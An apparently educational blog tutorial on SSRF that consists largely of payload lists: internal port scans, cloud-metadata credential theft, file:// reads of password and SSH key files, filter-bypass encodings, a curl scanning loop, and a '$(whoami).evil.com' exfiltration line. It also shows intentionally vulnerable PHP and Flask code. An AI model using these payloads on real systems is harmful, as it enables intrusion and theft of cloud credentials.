SSRF: When Your Server Becomes a Nosy Hacker — Part 1 🔍

This write-up has been prepared under the guidance of Amish Patel, Lay Patel at Hacker4Help as part of our learning initiative on cybersecurity awareness.

When your backend gets too curious and ends up being the hacker’s sidekick 😂

🎬 Scene 1: The Curious Case of the Chatty Server

Let’s imagine your server is like your slightly naive friend Bob.

Now, Bob’s job is to fetch stuff for you — pictures, JSON data, maybe even a cat video if you ask nicely.

But what if an attacker walks up and says:

“Hey Bob, can you go to this URL for me? Totally normal. Not sketchy at all. Definitely not http://localhost:1337/admin."

And Bob, bless his trusting soul, says: “Sure, buddy! Anything for a user!” 🫡

What Is SSRF, Really?

Server-Side Request Forgery (SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker’s choosing.

Technical Definition:

SSRF occurs when a web application accepts a user-supplied URL and retrieves the contents of this URL, but does not validate it against an allowlist of permitted domains or IP addresses.

The Attack Vector:

The attacker leverages the server’s network position and privileges to:

• Access internal services not exposed to the internet
• Bypass firewall restrictions
• Perform port scanning on internal networks
• Access cloud metadata services
• Potentially escalate to Remote Code Execution (RCE)

Funny Analogy: Bob the Backend and the Forbidden Fridge 🤡

Bob: “I’m just a backend doing my job.”

Attacker: “Go open that fridge labeled ‘For Employees Only.’”

Bob: Opens it without question

Fridge: Alarms blaring, database leaking, credentials falling like Jenga blocks

Real Exploit Flow 🔥

1. Vulnerable Endpoint Discovery

// Vulnerable PHP code example
<?php
if (isset($_GET['url'])) {
    $url = $_GET['url'];
    $content = file_get_contents($url);  // VULNERABLE!
    echo $content;
}
?>

# Vulnerable Python Flask example
@app.route('/fetch')
def fetch_url():
    url = request.args.get('url')
    response = requests.get(url)  # VULNERABLE!
    return response.text

2. Attack Vectors and Payloads

A. Internal Network Reconnaissance

# Port scanning internal network
http://target.com/fetch?url=http://127.0.0.1:22
http://target.com/fetch?url=http://127.0.0.1:80
http://target.com/fetch?url=http://127.0.0.1:443
http://target.com/fetch?url=http://127.0.0.1:3306  # MySQL
http://target.com/fetch?url=http://127.0.0.1:5432  # PostgreSQL
http://target.com/fetch?url=http://127.0.0.1:6379  # Redis
http://target.com/fetch?url=http://127.0.0.1:27017 # MongoDB

B. Cloud Metadata Exploitation

# AWS EC2 Metadata
http://target.com/fetch?url=http://169.254.169.254/latest/meta-data/
http://target.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://target.com/fetch?url=http://169.254.169.254/latest/user-data/

# Google Cloud Metadata
http://target.com/fetch?url=http://metadata.google.internal/computeMetadata/v1/
http://target.com/fetch?url=http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

# Azure Metadata
http://target.com/fetch?url=http://169.254.169.254/metadata/instance?api-version=2017-08-01

C. File System Access (if supported)

# Local file inclusion via file:// protocol
http://target.com/fetch?url=file:///etc/passwd
http://target.com/fetch?url=file:///etc/hosts
http://target.com/fetch?url=file:///proc/self/environ
http://target.com/fetch?url=file:///var/log/apache2/access.log

D. Internal Application Access

# Admin panels
http://target.com/fetch?url=http://localhost/admin
http://target.com/fetch?url=http://127.0.0.1:8080/manager/html

# Internal APIs
http://target.com/fetch?url=http://internal-api.company.local/users
http://target.com/fetch?url=http://192.168.1.100/api/config

Basic SSRF Exploitation Techniques 🛠️

1. Simple IP Address Bypasses

A. Alternative IP Representations

# Decimal notation (127.0.0.1 = 2130706433)
http://target.com/fetch?url=http://2130706433/

# Octal notation
http://target.com/fetch?url=http://0177.0.0.1/

# Hexadecimal notation
http://target.com/fetch?url=http://0x7f000001/

# Mixed representations
http://target.com/fetch?url=http://127.1/
http://target.com/fetch?url=http://127.0.1/
http://target.com/fetch?url=http://0x7f.1/

B. DNS Rebinding Attacks

# Using services like nip.io
http://target.com/fetch?url=http://127.0.0.1.nip.io/
http://target.com/fetch?url=http://localhost.127.0.0.1.nip.io/

# Custom DNS records pointing to internal IPs
http://target.com/fetch?url=http://internal.evil.com/  # Resolves to 127.0.0.1

2. URL Encoding and Obfuscation

# Single URL encoding
http://target.com/fetch?url=http%3A%2F%2F127.0.0.1%2F

# Double URL encoding
http://target.com/fetch?url=http%253A%252F%252F127.0.0.1%252F

# Unicode encoding
http://target.com/fetch?url=http://①②⑦.⓪.⓪.①/

# Using redirects to bypass filters
http://target.com/fetch?url=http://evil.com/redirect.php?to=127.0.0.1

3. Protocol Exploitation

A. HTTP/HTTPS Variations

# Standard HTTP
http://target.com/fetch?url=http://127.0.0.1/

# HTTPS (if SSL/TLS not validated)
http://target.com/fetch?url=https://127.0.0.1/

# Non-standard ports
http://target.com/fetch?url=http://127.0.0.1:8080/
http://target.com/fetch?url=http://127.0.0.1:9000/

B. File Protocol

# Linux/Unix systems
http://target.com/fetch?url=file:///etc/passwd
http://target.com/fetch?url=file:///proc/version
http://target.com/fetch?url=file:///home/user/.ssh/id_rsa

# Windows systems
http://target.com/fetch?url=file:///c:/windows/system.ini
http://target.com/fetch?url=file:///c:/boot.ini

🎯 High-Impact SSRF Attack Scenarios

1. AWS EC2 Instance Metadata Exploitation

# Step 1: Check if metadata service is accessible
http://target.com/fetch?url=http://169.254.169.254/

# Step 2: Get instance metadata
http://target.com/fetch?url=http://169.254.169.254/latest/meta-data/

# Step 3: Enumerate IAM roles
http://target.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Step 4: Get IAM role name (example: WebServerRole)
http://target.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/WebServerRole

# Step 5: Extract AWS credentials from response
{
  "Code" : "Success",
  "LastUpdated" : "2024-01-15T10:30:00Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA...",
  "SecretAccessKey" : "...",
  "Token" : "...",
  "Expiration" : "2024-01-15T16:30:00Z"
}

2. Internal Service Discovery

# Common internal service ports
PORTS=(22 23 25 53 80 110 143 443 993 995 1433 3306 3389 5432 5984 6379 8080 8443 9200 27017)

# Automated scanning script concept
for PORT in "${PORTS[@]}"; do
    echo "Testing port $PORT..."
    curl "http://target.com/fetch?url=http://127.0.0.1:$PORT"
    curl "http://target.com/fetch?url=http://localhost:$PORT"
    curl "http://target.com/fetch?url=http://0.0.0.0:$PORT"
done

3. Database Access Through SSRF

# MySQL (default port 3306)
http://target.com/fetch?url=http://127.0.0.1:3306/

# PostgreSQL (default port 5432)
http://target.com/fetch?url=http://127.0.0.1:5432/

# MongoDB (default port 27017)
http://target.com/fetch?url=http://127.0.0.1:27017/

# Redis (default port 6379)
http://target.com/fetch?url=http://127.0.0.1:6379/

# CouchDB (default port 5984)
http://target.com/fetch?url=http://127.0.0.1:5984/_all_dbs

Blind SSRF Detection 🎪

1. DNS-Based Detection

# Using Burp Collaborator
http://target.com/fetch?url=http://abc123.burpcollaborator.net/

# Using custom DNS server
http://target.com/fetch?url=http://ssrf-test.evil.com/

# DNS exfiltration
http://target.com/fetch?url=http://$(whoami).evil.com/

2. HTTP-Based Detection

# Using HTTP callbacks
http://target.com/fetch?url=http://requestbin.net/r/abc123

# Using webhook.site
http://target.com/fetch?url=https://webhook.site/unique-id

# Time-based detection
http://target.com/fetch?url=http://httpbin.org/delay/10

3. Error-Based Detection

# Connection timeout (closed port)
http://target.com/fetch?url=http://127.0.0.1:12345/

# Connection refused
http://target.com/fetch?url=http://192.168.1.1:22/

# DNS resolution failure
http://target.com/fetch?url=http://nonexistent-domain-12345.com/

Real-World Impact Examples 📊

1. Capital One Data Breach (2019)

• Attack Vector: SSRF against AWS EC2 metadata service
• Impact: 100+ million customer records compromised
• Technique: Exploited web application firewall to access EC2 metadata
• Lesson: Always restrict access to cloud metadata services

2. Shopify SSRF (2017)

• Bounty Paid: $25,000
• Attack Vector: Internal GraphQL endpoint access
• Impact: Internal service enumeration and sensitive data access
• Technique: Bypassed IP restrictions using DNS rebinding

3. Uber SSRF (2016)

• Bounty Paid: $8,000
• Attack Vector: Internal admin panel access
• Impact: Access to internal Uber services
• Technique: Simple localhost bypass using 127.0.0.1

🎬 Part 1 Conclusion: Bob’s First Lesson

Bob: “Wait, so you’re telling me I’ve been helping attackers this whole time?”

Security Team: “Unfortunately, yes. But don’t worry, we’re going to teach you some advanced tricks to spot these attacks!”

Attacker: “Uh oh, they’re getting smarter…”

Stay tuned for Part 2 where we dive deep into advanced exploitation techniques and learn how Bob finally becomes a security-aware backend!

End of Part 1 🎯